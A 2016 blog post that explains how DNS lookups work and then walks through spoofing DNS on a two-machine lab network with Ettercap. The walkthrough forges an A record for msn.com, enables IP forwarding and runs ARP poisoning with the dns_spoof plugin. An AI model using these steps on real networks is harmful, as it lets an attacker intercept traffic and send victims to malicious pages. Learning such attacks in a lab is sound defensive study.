Monday, July 11, 2016

DNS – What It is and How to Spoof It

DNS stands for Domain Name System and it does the job of translating the name of websites you enter in the address bar into an IP address.

When you enter www.google.com into the address bar, it gets translated to the respective IP address and after that, a connection is established.

Here’s how the process goes:

1. You enter the hostname www.xyz.com into the address bar

2. Your computer searches for the IP in the local DNS cache. If it’s not found, a DNS query is performed.

3. The query is sent to recursive name servers – these are with your ISP and have their own cache.

4. If the recursive servers don’t have the answer, they will query the root nameserver.

5. The root nameserver will look at your request from right to left for TLD (.com , .in , .us)

6. The query is then directed to the top level domain (TLD) nameserver

7. The query is looked at (from right to left minus the TLD part) for specific domain.

8. Finally, the query goes to the authoritative DNS servers. These know everything there is to know about a domain. These have DNS records like – A, mx etc. and the recursive server will retrieve the record and give it back to you.

 

Common DNS records:

A = forward DNS lookup

MX = mail exchange record

PTR = reverse DNS lookup

 

What’s a nameserver?

A computer that’s permanently connected to the internet and translates a domain name into an IP address.

 

What’s Ettercap?

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing

 

Spoofing DNS using Ettercap

The victim will try to connect to msn.com and instead will see the attacker hosted webpage.

Scenario: 2 machines – Kali Linux and Windows 8

On Kali Linux

1. locate a file by the name etter.dns

#locate etter.dns

the file will be under /etc/ettercap

open the file using the nano editor

scroll down and you’ll ee a line

*wildcards in PTR are not allowed

there will be examples given and like them, add your entry.

for instance -> www.msn.com A 192.168.1.8

where A is the DNS record, and the IP is of your Kali Linux machine

ave and exit.

2.  go to this directory

/proc/sys/net/ipv4

there will be a file by the name ip_forward.

open the file with nano and you’ll find that it’s set to 0. make it 1.

save and exit.

3. use the dns_spoof plugin of ettercap

# ettercap -T -q -M arp:remote -P dns_spoof //

and the plugin will start

(enter q to abort)

(enter ettercap –help to see options)

go to your Windows machine and ping the msn website.

you’ll see that reply being received is from 192.168.1.8 – the Kali machine – instead of the msn.com’s IP.

Smilarly, if you were to enter www.msn.com in the browser on Windows, you’ll be redirected to the Kali Linux machine where you can host your own page for malicious / non malicious intent.

All of this will make much more sense if you familiarize yourself with ARP spoofing.

No comments:

Post a Comment